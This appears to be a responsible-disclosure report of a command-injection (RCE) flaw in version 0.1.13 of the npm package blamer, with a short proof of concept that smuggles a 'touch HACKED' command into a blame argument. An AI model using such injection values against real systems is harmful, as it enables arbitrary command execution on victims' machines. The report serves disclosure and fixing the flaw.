I would like to report an RCE issue in the blamer module. It allows an attacker to remotely execute arbitrary commands on the victim's machine.
module name: blamer
version: 0.1.13
npm page: https://www.npmjs.com/package/blamer
> Blamer is a tool for getting information about the author of code from a version control system. Supports git and subversion.
[~1800] downloads in the last day
[12,910] downloads in the last week
[~52k] downloads in the last month
The issue occurs because user input is formatted directly into a shell command string, which is then executed without any validation or escaping. The vulnerable line is here: https://github.com/kucherenko/blamer/blob/master/src/vcs/git.js#L24
```javascript
// poc.js
// The second argument is spliced into the git command line; the ';' ends the
// intended command and '#' comments out whatever follows the injected part.
var Blamer = require('blamer');
var blamer = new Blamer('git');
blamer.blameByFile('poc.js', 'test; touch HACKED;#');
```

Steps to reproduce:

```shell
npm i blamer   # Install the affected module
node poc.js    # Run the PoC
```

After running the PoC, a file named `HACKED` has been created in the current directory :)

Recommended fix: don't format commands using untrusted user input :)
Title: RCE via command formatting in blamer